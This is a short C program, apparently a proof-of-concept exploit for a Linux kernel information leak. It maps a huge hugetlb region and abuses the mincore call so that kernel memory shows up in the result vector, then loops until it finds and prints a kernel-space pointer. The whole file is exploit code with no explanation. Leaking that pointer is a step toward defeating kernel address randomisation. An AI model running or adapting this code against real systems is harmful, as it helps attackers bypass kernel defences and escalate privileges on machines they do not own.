
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int MAP_ANONYMOUS ;
 scalar_t__ MAP_FAILED ;
 int MAP_HUGETLB ;
 int MAP_NORESERVE ;
 int MAP_SHARED ;
 int PROT_NONE ;
 int err (int,char*) ;
 int getpagesize () ;
 scalar_t__ mincore (void*,int,unsigned char*) ;
 scalar_t__ mmap (void*,int,int ,int,int,int ) ;
 int perror (char*) ;
 int printf (char*,unsigned long) ;

int main(void) {
  unsigned char buf[getpagesize()/sizeof(unsigned char)];
  int right = 1;
  unsigned long addr = 0;


  if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED)
    err(1, "mmap");

  while(right){

    if (mincore((void*)0x86000000, 0x1000000, buf))
      perror("mincore");
    for( int n=0; n<getpagesize()/sizeof(unsigned char); n++) {
      addr = *(unsigned long*)(&buf[n]);

      if(addr > 0xffffffff00000000){
 right = 0;
 goto out;
      }
    }
  }
 out:
  printf("%p\n", addr);
  return 0;
}
